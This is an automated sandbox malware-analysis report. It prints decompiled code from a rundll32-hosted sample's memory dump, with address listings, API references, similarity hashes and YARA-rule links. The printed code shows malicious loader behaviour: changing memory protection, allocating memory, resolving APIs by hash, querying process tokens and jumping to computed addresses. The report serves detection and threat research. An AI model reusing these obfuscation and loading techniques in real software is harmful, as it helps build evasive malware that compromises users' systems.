						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x974418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E00972569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x0097221f
0x0097222d
0x00972234
0x00972237
0x00972241
0x00972248
0x00972252
0x00972258
0x00972261
0x0097226a
0x0097226d
0x00972273
0x00972277
0x0097227f
0x00972283
0x00972286
0x00972289
0x0097228c
0x0097228f
0x009722a9
0x009722af
0x009722b2
0x009722ba
0x009722be
0x009722c1
0x009722c4
0x009722c7
0x009722ca
0x009722e6
0x00972303
0x00972328
0x0097232a
0x00972333
0x00972336
0x00972340
0x00972343
0x00972346
0x00972349
0x0097234c
0x009723a4
0x009723a4
0x0097254a
0x00972550
0x0097244d
0x00972453
0x0097249f
0x0097249f
0x009724bc
0x009724e2
0x009724f0
0x009724f3
0x009724f7
0x009724fb
0x00972502
0x00972508
0x0097250a
0x0097251c
0x00972524
0x0097252a
0x00972530
0x00972536
0x00000000
0x00000000
0x0097253c
0x0097249f
0x0097245b
0x00972469
0x00972471
0x00972474
0x00972476
0x0097247c
0x00972488
0x0097248e
0x00972491
0x00972494
0x0097238a
0x0097238a
0x009723d8
0x009723de
0x009723e4
0x009723ea
0x009723f0
0x009723f5
0x009723fb
0x009723fe
0x00972401
0x00972409
0x00972411
0x00972414
0x00972417
0x0097241d
0x00972423
0x0097242e
0x00972362
0x00972368
0x00972368
0x009723c5

APIs

VirtualProtect.KERNELBASE ref: 0097228F
VirtualProtect.KERNELBASE ref: 00972328

Strings

t, xrefs: 00972409

Memory Dump Source

Source File: 00000000.00000002.444874277.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 977a5b8c2a2827963ee307a20004e221a56f4bb04c7a3fda71bd485db80a1efe
Instruction ID: 2b5f44e58f5a77cc9e4c3ebab2156ff0d80940b9ecfca9cd96bae8ca9916c999
Opcode Fuzzy Hash: 977a5b8c2a2827963ee307a20004e221a56f4bb04c7a3fda71bd485db80a1efe
Instruction Fuzzy Hash: 87819BB5E042089FCB04CF99C580A9DFBF1FF88710F65856AE958AB361D334A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00972439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00972508

Memory Dump Source

Source File: 00000000.00000002.444874277.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7e8ea4ff2d537d41041ef037521fea059e12cf03c02363113eccab27d3d2e93b
Instruction ID: ae8b3d96b0520e170817fadee269ae80402d5b6c25da35a1bcaf4413ebc760f9
Opcode Fuzzy Hash: 7e8ea4ff2d537d41041ef037521fea059e12cf03c02363113eccab27d3d2e93b
Instruction Fuzzy Hash: 9831E9B6D102288FDB14CF69C98069DB7F1BF88700F258699D94CA7356D731AE81CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00971D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00971EA8

Memory Dump Source

Source File: 00000000.00000002.444874277.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: 9211741344de625fe5d8b559a9acd2a568d5c08602e434a5e98566274cae47cf
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: F241D3B5E052199FDB04DFA8C4906AEBBF1FF48714F15856EE848AB340D735A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 7060 Parent PID: 7032 rundll32.exeCOMMON

Executed Functions

Function 709A07CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E709A07CC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t152;
				void* _t155;
				signed char* _t156;
				char _t159;
				intOrPtr* _t163;
				void* _t177;
				intOrPtr _t186;
				char _t187;
				void* _t192;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t208;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t219;
				void* _t232;
				void* _t234;
				void* _t237;
				void* _t240;
				void* _t243;
				void* _t246;
				void* _t250;
				void* _t254;
				void* _t255;
				void* _t257;
				long _t258;
				void* _t261;
				void* _t264;
				int _t267;
				void* _t268;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t278;
				int _t280;
				intOrPtr* _t284;
				signed char _t288;
				signed char _t289;
				signed int _t293;
				void* _t314;
				void* _t319;
				void* _t355;
				void* _t364;
				void* _t369;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t385;
				void* _t392;
				signed int _t397;
				intOrPtr* _t400;
				void* _t403;
				signed int _t405;
				void* _t407;
				void* _t408;
				void* _t413;
				intOrPtr* _t417;
				void* _t419;
				void** _t421;
				void* _t422;
				void* _t423;
				void* _t424;

				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t423 = _t422 - 0x1e0;
				_t407 = __ecx;
				_t152 =  *0x709ad1f8;
				if(_t152 == 0x16a9e13a) {
					_t152 = E709A3558(0x30);
					 *0x709ad1f8 = _t152;
				}
				if( *((char*)(_t152 + 0xb)) == 0 || _t407 != 0) {
					_t408 = _t423 + 0x48;
					E709A35D4(_t408, 0, 0x11c);
					_t424 = _t423 + 0xc;
					 *((intOrPtr*)(_t424 + 0x48)) = 0x11c;
					_t155 = E709A2F94(0x4bcc7cba, 0xa7920a3, 0x4bcc7cba, 0x4bcc7cba);
					if(_t155 == 0) {
						_t395 =  *0x709ad1f8;
						_t156 = _t424 + 0x4c;
						_t288 =  *_t156;
						 *(_t395 + 8) = _t288;
						_t289 = _t156[4];
						 *(_t395 + 9) = _t289;
						__eflags = _t156[0x116] - 1;
						_t389 =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xa)) = _t156[0x110];
						 *(_t395 + 4) =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xc)) = 0 | _t156[0x116] != 0x00000001;
						 *_t395 = (_t289 & 0x000000ff) + ((_t288 & 0x000000ff) << 4) - 0x50;
						_t159 = E709A1094(_t395);
						 *(_t424 + 0x198) = 0;
						 *((char*)( *0x709ad1f8 + 0xb)) = _t159;
						_t355 = E709A2F94(0xd0443458, 0xd8ece5ad, _t159, _t159);
						__eflags = _t355;
						if(_t355 == 0) {
							L12:
							__eflags = 0;
							 *((char*)( *0x709ad1f8 + 0x28)) = 0;
							_t163 = E709A07CC(0x709ad1f8, 0, _t389, _t395);
							__eflags =  *_t163 - 0x10;
							if( *_t163 >= 0x10) {
								_t293 = 6;
								memcpy(_t424 + 0x164, 0x709abc80, _t293 << 2);
								_t424 = _t424 + 0xc;
								_t392 = 0x709abc80 + _t293 + _t293;
								 *((intOrPtr*)(_t424 + 0x1c)) = 0;
								E7099F620(_t424 + 0x24, 0);
								_t397 = 0;
								__eflags = 0;
								do {
									E7099F8C4(_t424 + 0x24, E7099F568(_t424 + 0x20) + 4);
									 *((intOrPtr*)(E7099F558(_t424 + 0x24, E7099F568(_t424 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t424 + 0x164 + _t397 * 4));
									_t397 = _t397 + 1;
									 *((intOrPtr*)(_t424 + 0x1c)) =  *((intOrPtr*)(_t424 + 0x1c)) + 1;
									__eflags = _t397 - 6;
								} while (_t397 < 6);
								_push(0);
								E709A54EC(_t424 + 0xc, _t424 + 0x1c, 0x80000002);
								E7099F6F0(_t424 + 0x20);
								E709A551C(_t424 + 8, _t424 + 0x1c0, 0x5411b30);
								_t177 = E709A57D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c0)));
								_t398 = _t177;
								E7099E054(_t424 + 0x1c0);
								__eflags = _t177;
								if(_t177 != 0) {
									E709A551C(_t424 + 8, _t424 + 0x1c8, 0xdb1d9b48);
									_t413 = E709A57D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c8)));
									E7099E054(_t424 + 0x1c8);
									_t398 = _t424 + 0x1d0;
									E709A551C(_t424 + 8, _t424 + 0x1d0, 0xf3453dd0);
									_t392 = E709A57D0(_t424 + 4, __eflags,  *(_t424 + 0x1d0));
									E7099E054(_t424 + 0x1d0);
									__eflags = _t413;
									if(_t413 != 0) {
										__eflags = _t413 - 5;
										if(_t413 != 5) {
											__eflags = _t413 - 2;
											if(_t413 != 2) {
												goto L58;
											} else {
												__eflags = _t392 - 1;
												if(_t392 != 1) {
													goto L58;
												} else {
													E7099D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t375 =  *(_t424 + 4);
														__eflags = _t375;
														if(_t375 == 0) {
															L53:
															_t237 = 1;
														} else {
															__eflags = _t375 - 0xffffffff;
															if(_t375 != 0xffffffff) {
																_t237 = 0;
																__eflags = 0;
															} else {
																goto L53;
															}
														}
														__eflags = _t237;
														if(_t237 == 0) {
															E709A54C4(_t375);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 5;
												}
											}
										} else {
											__eflags = _t392;
											if(_t392 != 0) {
												__eflags = _t392 - 1;
												if(_t392 == 1) {
													E7099D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t376 =  *(_t424 + 4);
														__eflags = _t376;
														if(_t376 == 0) {
															L108:
															_t240 = 1;
														} else {
															__eflags = _t376 - 0xffffffff;
															if(_t376 != 0xffffffff) {
																_t240 = 0;
																__eflags = 0;
															} else {
																goto L108;
															}
														}
														__eflags = _t240;
														if(_t240 == 0) {
															E709A54C4(_t376);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 4;
												} else {
													goto L58;
												}
											} else {
												E7099D098(_t424 + 0xc);
												__eflags =  *((char*)(_t424 + 8));
												if( *((char*)(_t424 + 8)) != 0) {
													_t377 =  *(_t424 + 4);
													__eflags = _t377;
													if(_t377 == 0) {
														L41:
														_t243 = 1;
													} else {
														__eflags = _t377 - 0xffffffff;
														if(_t377 != 0xffffffff) {
															_t243 = 0;
															__eflags = 0;
														} else {
															goto L41;
														}
													}
													__eflags = _t243;
													if(_t243 == 0) {
														E709A54C4(_t377);
													}
												}
												 *(_t424 + 4) = 0;
												_t186 = 3;
											}
										}
									} else {
										__eflags = _t392;
										if(_t392 != 0) {
											L58:
											E7099D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t374 =  *(_t424 + 4);
												__eflags = _t374;
												if(_t374 == 0) {
													L61:
													_t234 = 1;
												} else {
													__eflags = _t374 - 0xffffffff;
													if(_t374 != 0xffffffff) {
														_t234 = 0;
														__eflags = 0;
													} else {
														goto L61;
													}
												}
												__eflags = _t234;
												if(_t234 == 0) {
													E709A54C4(_t374);
												}
											}
											_t186 = 0;
											__eflags = 0;
											 *(_t424 + 4) = 0;
										} else {
											E7099D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t378 =  *(_t424 + 4);
												__eflags = _t378;
												if(_t378 == 0) {
													L31:
													_t246 = 1;
												} else {
													__eflags = _t378 - 0xffffffff;
													if(_t378 != 0xffffffff) {
														_t246 = 0;
														__eflags = 0;
													} else {
														goto L31;
													}
												}
												__eflags = _t246;
												if(_t246 == 0) {
													E709A54C4(_t378);
												}
											}
											 *(_t424 + 4) = 0;
											_t186 = 2;
										}
									}
								} else {
									E7099D098(_t424 + 0xc);
									__eflags =  *((char*)(_t424 + 8));
									if( *((char*)(_t424 + 8)) != 0) {
										_t379 =  *(_t424 + 4);
										__eflags = _t379;
										if(_t379 == 0) {
											L21:
											_t250 = 1;
										} else {
											__eflags = _t379 - 0xffffffff;
											if(_t379 != 0xffffffff) {
												_t250 = 0;
												__eflags = 0;
											} else {
												goto L21;
											}
										}
										__eflags = _t250;
										if(_t250 == 0) {
											E709A54C4(_t379);
										}
									}
									 *(_t424 + 4) = 0;
									_t186 = 1;
								}
							} else {
								_t186 = 1;
							}
							 *((intOrPtr*)( *0x709ad1f8 + 0x24)) = _t186;
							_t187 = E709A10CC(0xffffffffffffffff);
							_t314 =  *0x709ad1f8;
							 *((char*)(_t314 + 0x29)) = _t187;
							__eflags =  *_t314 - 0x10;
							 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t314 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x709ad1f8 + 0x2c)) = E709A1140(0xffffffffffffffff, _t392, _t398);
								goto L78;
							} else {
								 *(_t424 + 0x19c) = 0;
								_t364 = E709A2F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
								__eflags = _t364;
								if(_t364 == 0) {
									L74:
									_t196 =  *0x709ad1f8;
									__eflags =  *((char*)(_t196 + 0x28));
									if( *((char*)(_t196 + 0x28)) == 0) {
										 *((intOrPtr*)(_t196 + 0x2c)) = 3;
									} else {
										 *((intOrPtr*)(_t196 + 0x2c)) = 5;
									}
									goto L78;
								} else {
									_t198 =  *_t364(0xffffffff, 8, _t424 + 0x19c);
									__eflags = _t198;
									if(_t198 == 0) {
										_t199 = E709A352C(_t398);
										__eflags = _t199;
										if(_t199 != 0) {
											goto L74;
										} else {
											goto L69;
										}
									} else {
										L69:
										 *(_t424 + 0x30) =  *(_t424 + 0x19c);
										 *((char*)(_t424 + 0x34)) = 1;
										 *(_t424 + 0x1a4) = 0;
										_t319 = E709A2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
										__eflags = _t319;
										if(_t319 != 0) {
											_t232 =  *_t319( *(_t424 + 0x1ac), 1, 0, 0, _t424 + 0x1a4);
											__eflags = _t232;
											if(_t232 == 0) {
												E709A352C(_t398);
											}
										}
										_t202 =  *(_t424 + 0x1a4);
										__eflags = _t202;
										if(_t202 != 0) {
											E7099F620(_t424 + 0x18c, _t202);
											_t403 = E709A2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
											__eflags = _t403;
											if(_t403 == 0) {
												L124:
												E7099F6F0(_t424 + 0x188);
												goto L72;
											} else {
												_t208 = E7099F558(_t424 + 0x18c, 0);
												_t209 = E7099F568(_t424 + 0x188);
												_t211 =  *_t403( *(_t424 + 0x1ac), 1, _t208, _t209, _t424 + 0x1a4);
												__eflags = _t211;
												if(_t211 == 0) {
													_t212 = E709A352C(_t403);
													__eflags = _t212;
													if(_t212 != 0) {
														goto L124;
													} else {
														goto L116;
													}
												} else {
													L116:
													_t417 = E7099F558(_t424 + 0x18c, 0);
													E7099DFFC(_t424 + 0x1b4, 0);
													 *(_t424 + 0x1ac) = 0;
													_t369 = E709A2F94(0xd0443458, 0x39521505, 0xd0443458, 0xd0443458);
													__eflags = _t369;
													if(_t369 != 0) {
														 *_t369( *_t417, _t424 + 0x1ac);
													}
													E7099E070(_t424 + 0x1b4,  *(_t424 + 0x1ac));
													_t219 = E709A2F94(0x4bcc7cba, 0x1f221433, 0x4bcc7cba, 0x4bcc7cba);
													__eflags = _t219;
													if(_t219 == 0) {
														E7099E11C(_t424 + 0x1b8 - 8, _t424 + 0x1b8);
														_t419 = E709A4BE0( *((intOrPtr*)(_t424 + 0x1b8)), E7099E94C( *((intOrPtr*)(_t424 + 0x1b8)), 0x7fffffff));
														E7099E054(_t424 + 0x1b8);
														E7099E054(_t424 + 0x1b0);
														E7099F6F0(_t424 + 0x188);
														__eflags =  *((char*)(_t424 + 0x34));
														if( *((char*)(_t424 + 0x34)) != 0) {
															E7099BC00(_t424 + 0x30);
														}
														__eflags = _t419 - 0x6df4cf7;
														if(_t419 != 0x6df4cf7) {
															goto L74;
														} else {
															 *((intOrPtr*)( *0x709ad1f8 + 0x2c)) = 6;
															L78:
															_t192 = E709A2F94(0x4bcc7cba, 0x57154e4e, 0x4bcc7cba, 0x4bcc7cba);
															__eflags = _t192;
															if(_t192 != 0) {
																GetSystemInfo(_t424 + 0x164); // executed
															}
															_t152 =  *0x709ad1f8;
															_t284 = _t424 + 0x178;
															_t400 = _t424 + 0x170;
															 *((short*)(_t152 + 0xe)) =  *_t284;
															 *((intOrPtr*)(_t152 + 0x10)) =  *((intOrPtr*)(_t284 - 0x10));
															 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t284 - 0xc));
															 *((intOrPtr*)(_t152 + 0x18)) =  *_t400;
															 *((intOrPtr*)(_t152 + 0x1c)) =  *((intOrPtr*)(_t400 + 0x10));
															goto L81;
														}
													} else {
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t219;
													}
												}
											}
										} else {
											L72:
											__eflags =  *((char*)(_t424 + 0x34));
											if( *((char*)(_t424 + 0x34)) != 0) {
												E7099BC00(_t424 + 0x30);
											}
											goto L74;
										}
									}
								}
							}
						} else {
							_t254 =  *_t355(0xffffffff, 8, _t424 + 0x198);
							__eflags = _t254;
							if(_t254 == 0) {
								_t255 = E709A352C(_t395);
								__eflags = _t255;
								if(_t255 != 0) {
									goto L12;
								} else {
									goto L7;
								}
							} else {
								L7:
								 *(_t424 + 0x14) =  *(_t424 + 0x198);
								 *((char*)(_t424 + 0x18)) = 1;
								 *(_t424 + 0x1a0) = 0;
								_t257 = E709A2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
								__eflags = _t257;
								if(_t257 != 0) {
									_t280 = GetTokenInformation( *(_t424 + 0x1a8), 2, 0, 0, _t424 + 0x1a0); // executed
									__eflags = _t280;
									if(_t280 == 0) {
										E709A352C(_t395);
									}
								}
								_t258 =  *(_t424 + 0x1a0);
								__eflags = _t258;
								if(_t258 != 0) {
									E7099F620(_t424 + 0x3c, _t258);
									_t261 = E709A2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
									_t395 = _t261;
									__eflags = _t261;
									if(_t261 == 0) {
										L98:
										E7099F6F0(_t424 + 0x38);
										goto L10;
									} else {
										_t264 = E7099F558(_t424 + 0x3c, 0);
										_t267 = GetTokenInformation( *(_t424 + 0x1a8), 2, _t264, E7099F568(_t424 + 0x38), _t424 + 0x1a0); // executed
										__eflags = _t267;
										if(_t267 == 0) {
											_t268 = E709A352C(_t395);
											__eflags = _t268;
											if(_t268 != 0) {
												goto L98;
											} else {
												goto L85;
											}
										} else {
											L85:
											_t421 = E7099F558(_t424 + 0x3c, 0);
											_t389 = _t424 + 0x1d8;
											 *(_t424 + 0x1d8 - 0x30) = 0;
											asm("movsd");
											asm("movsb");
											asm("movsb");
											_t395 = E709A2F94(0xd0443458, 0xe6199b6e, 0xd0443458, 0xd0443458);
											__eflags = _t395;
											if(_t395 == 0) {
												goto L98;
											} else {
												_t272 = _t424 + 0x1a8;
												_t273 =  *_t395(_t272 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t272);
												__eflags = _t273;
												if(_t273 == 0) {
													_t274 = E709A352C(_t395);
													__eflags = _t274;
													if(_t274 != 0) {
														goto L98;
													} else {
														goto L87;
													}
												} else {
													L87:
													_t389 =  *(_t424 + 0x1a8);
													__eflags =  *_t421;
													if( *_t421 <= 0) {
														L92:
														__eflags = _t389;
														if(_t389 == 0) {
															L94:
															_t385 = 1;
														} else {
															__eflags = _t389 - 0xffffffff;
															if(_t389 != 0xffffffff) {
																_t385 = 0;
																__eflags = 0;
															} else {
																goto L94;
															}
														}
														__eflags = _t385;
														if(_t385 == 0) {
															E709A1070(_t389, _t395, _t389);
														}
														goto L98;
													} else {
														_t405 = 0;
														__eflags = 0;
														while(1) {
															_t278 = E709A2F94(0xd0443458, 0x713d44b5, 0xd0443458, 0xd0443458);
															__eflags = _t278;
															if(_t278 != 0) {
																break;
															}
															_t405 = _t405 + 1;
															__eflags = _t405 -  *_t421;
															if(_t405 <  *_t421) {
																continue;
															} else {
																goto L92;
															}
															goto L130;
														}
														_push( *((intOrPtr*)(_t421 + 4 + _t405 * 8)));
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t278;
													}
												}
											}
										}
									}
								} else {
									L10:
									__eflags =  *((char*)(_t424 + 0x18));
									if( *((char*)(_t424 + 0x18)) != 0) {
										E7099BC00(_t424 + 0x14);
									}
									goto L12;
								}
							}
						}
					} else {
						_push(_t408);
						asm("int3");
						return _t155;
					}
				} else {
					L81:
					return _t152;
				}
				L130:
			}

0x709a07cc
0x709a07cd
0x709a07ce
0x709a07d0
0x709a07db
0x709a07dd
0x709a07e4
0x709a1063
0x709a1069
0x709a1069
0x709a07ee
0x709a07fa
0x709a0806
0x709a080b
0x709a0818
0x709a0822
0x709a0829
0x709a082e
0x709a0832
0x709a0836
0x709a083b
0x709a083e
0x709a0844
0x709a084a
0x709a0857
0x709a085e
0x709a0865
0x709a0868
0x709a086b
0x709a086d
0x709a0879
0x709a0886
0x709a0893
0x709a0895
0x709a0897
0x709a0923
0x709a0923
0x709a0929
0x709a092c
0x709a0931
0x709a0934
0x709a094c
0x709a094d
0x709a094d
0x709a094d
0x709a0951
0x709a095a
0x709a095f
0x709a095f
0x709a0961
0x709a0972
0x709a0994
0x709a0996
0x709a0997
0x709a099b
0x709a099b
0x709a09a4
0x709a09b0
0x709a09b9
0x709a09cf
0x709a09df
0x709a09e4
0x709a09e8
0x709a09ed
0x709a09ef
0x709a0a3f
0x709a0a54
0x709a0a58
0x709a0a5d
0x709a0a6e
0x709a0a83
0x709a0a87
0x709a0a8c
0x709a0a8e
0x709a0ad5
0x709a0ad8
0x709a0b26
0x709a0b29
0x00000000
0x709a0b2b
0x709a0b2b
0x709a0b2e
0x00000000
0x709a0b30
0x709a0b34
0x709a0b39
0x709a0b3e
0x709a0b40
0x709a0b44
0x709a0b46
0x709a0b4d
0x709a0b4d
0x709a0b48
0x709a0b48
0x709a0b4b
0x709a0b51
0x709a0b51
0x00000000
0x00000000
0x00000000
0x709a0b4b
0x709a0b53
0x709a0b55
0x709a0b58
0x709a0b58
0x709a0b55
0x709a0b5d
0x709a0b67
0x709a0b67
0x709a0b2e
0x709a0ada
0x709a0ada
0x709a0adc
0x709a0b1b
0x709a0b1e
0x709a0e90
0x709a0e95
0x709a0e9a
0x709a0e9c
0x709a0ea0
0x709a0ea2
0x709a0ea9
0x709a0ea9
0x709a0ea4
0x709a0ea4
0x709a0ea7
0x709a0ead
0x709a0ead
0x00000000
0x00000000
0x00000000
0x709a0ea7
0x709a0eaf
0x709a0eb1
0x709a0eb4
0x709a0eb4
0x709a0eb1
0x709a0eb9
0x709a0ec3
0x709a0b24
0x00000000
0x709a0b24
0x709a0ade
0x709a0ae2
0x709a0ae7
0x709a0aec
0x709a0aee
0x709a0af2
0x709a0af4
0x709a0afb
0x709a0afb
0x709a0af6
0x709a0af6
0x709a0af9
0x709a0aff
0x709a0aff
0x00000000
0x00000000
0x00000000
0x709a0af9
0x709a0b01
0x709a0b03
0x709a0b06
0x709a0b06
0x709a0b03
0x709a0b0b
0x709a0b15
0x709a0b15
0x709a0adc
0x709a0a90
0x709a0a90
0x709a0a92
0x709a0b6a
0x709a0b6e
0x709a0b73
0x709a0b78
0x709a0b7a
0x709a0b7e
0x709a0b80
0x709a0b87
0x709a0b87
0x709a0b82
0x709a0b82
0x709a0b85
0x709a0b8b
0x709a0b8b
0x00000000
0x00000000
0x00000000
0x709a0b85
0x709a0b8d
0x709a0b8f
0x709a0b92
0x709a0b92
0x709a0b8f
0x709a0b97
0x709a0b97
0x709a0b99
0x709a0a98
0x709a0a9c
0x709a0aa1
0x709a0aa6
0x709a0aa8
0x709a0aac
0x709a0aae
0x709a0ab5
0x709a0ab5
0x709a0ab0
0x709a0ab0
0x709a0ab3
0x709a0ab9
0x709a0ab9
0x00000000
0x00000000
0x00000000
0x709a0ab3
0x709a0abb
0x709a0abd
0x709a0ac0
0x709a0ac0
0x709a0abd
0x709a0ac5
0x709a0acf
0x709a0acf
0x709a0a92
0x709a09f1
0x709a09f5
0x709a09fa
0x709a09ff
0x709a0a01
0x709a0a05
0x709a0a07
0x709a0a0e
0x709a0a0e
0x709a0a09
0x709a0a09
0x709a0a0c
0x709a0a12
0x709a0a12
0x00000000
0x00000000
0x00000000
0x709a0a0c
0x709a0a14
0x709a0a16
0x709a0a19
0x709a0a19
0x709a0a16
0x709a0a1e
0x709a0a28
0x709a0a28
0x709a0936
0x709a0938
0x709a0938
0x709a0ba2
0x709a0ba5
0x709a0baa
0x709a0bac
0x709a0bb5
0x709a0bc1
0x709a0bc4
0x709a0c92
0x709a0c9a
0x00000000
0x709a0bca
0x709a0bd4
0x709a0be6
0x709a0be8
0x709a0bea
0x709a0c76
0x709a0c76
0x709a0c78
0x709a0c7c
0x709a0c87
0x709a0c7e
0x709a0c7e
0x709a0c7e
0x00000000
0x709a0bf0
0x709a0bfc
0x709a0bfe
0x709a0c00
0x709a104f
0x709a1054
0x709a1056
0x00000000
0x709a105c
0x00000000
0x709a105c
0x709a0c06
0x709a0c06
0x709a0c17
0x709a0c1b
0x709a0c20
0x709a0c32
0x709a0c34
0x709a0c36
0x709a0c4d
0x709a0c4f
0x709a0c51
0x709a0ec9
0x709a0ec9
0x709a0c51
0x709a0c57
0x709a0c5e
0x709a0c60
0x709a0edb
0x709a0ef1
0x709a0ef3
0x709a0ef5
0x709a1030
0x709a1037
0x00000000
0x709a0efb
0x709a0f04
0x709a0f12
0x709a0f2c
0x709a0f2e
0x709a0f30
0x709a1041
0x709a1046
0x709a1048
0x00000000
0x709a104a
0x00000000
0x709a104a
0x709a0f36
0x709a0f36
0x709a0f44
0x709a0f4f
0x709a0f5e
0x709a0f70
0x709a0f72
0x709a0f74
0x709a0f81
0x709a0f81
0x709a0f91
0x709a0fa2
0x709a0fa7
0x709a0fa9
0x709a0fbf
0x709a0fe0
0x709a0fe9
0x709a0ff5
0x709a1001
0x709a1006
0x709a100b
0x709a1011
0x709a1011
0x709a1016
0x709a101c
0x00000000
0x709a1022
0x709a1024
0x709a0c9d
0x709a0ca9
0x709a0cb0
0x709a0cb2
0x709a0cbc
0x709a0cbc
0x709a0cbe
0x709a0cc0
0x709a0ccf
0x709a0cdb
0x709a0cdf
0x709a0ce2
0x709a0ce5
0x709a0ce8
0x00000000
0x709a0ce8
0x709a0fab
0x709a0fab
0x709a0fb2
0x709a0fb3
0x709a0fb3
0x709a0fa9
0x709a0f30
0x709a0c66
0x709a0c66
0x709a0c66
0x709a0c6b
0x709a0c71
0x709a0c71
0x00000000
0x709a0c6b
0x709a0c60
0x709a0c00
0x709a0bea
0x709a089d
0x709a08a9
0x709a08ab
0x709a08ad
0x709a0e7a
0x709a0e7f
0x709a0e81
0x00000000
0x709a0e87
0x00000000
0x709a0e87
0x709a08b3
0x709a08b3
0x709a08c4
0x709a08c8
0x709a08cd
0x709a08da
0x709a08e1
0x709a08e3
0x709a08fa
0x709a08fc
0x709a08fe
0x709a0cf6
0x709a0cf6
0x709a08fe
0x709a0904
0x709a090b
0x709a090d
0x709a0d05
0x709a0d16
0x709a0d1b
0x709a0d1d
0x709a0d1f
0x709a0e50
0x709a0e54
0x00000000
0x709a0d25
0x709a0d2b
0x709a0d50
0x709a0d52
0x709a0d54
0x709a0e6c
0x709a0e71
0x709a0e73
0x00000000
0x709a0e75
0x00000000
0x709a0e75
0x709a0d5a
0x709a0d5a
0x709a0d65
0x709a0d6c
0x709a0d73
0x709a0d7a
0x709a0d7b
0x709a0d7c
0x709a0d8e
0x709a0d90
0x709a0d92
0x00000000
0x709a0d98
0x709a0d9a
0x709a0db5
0x709a0db7
0x709a0db9
0x709a0e5e
0x709a0e63
0x709a0e65
0x00000000
0x709a0e67
0x00000000
0x709a0e67
0x709a0dbf
0x709a0dbf
0x709a0dbf
0x709a0dc6
0x709a0dca
0x709a0e35
0x709a0e35
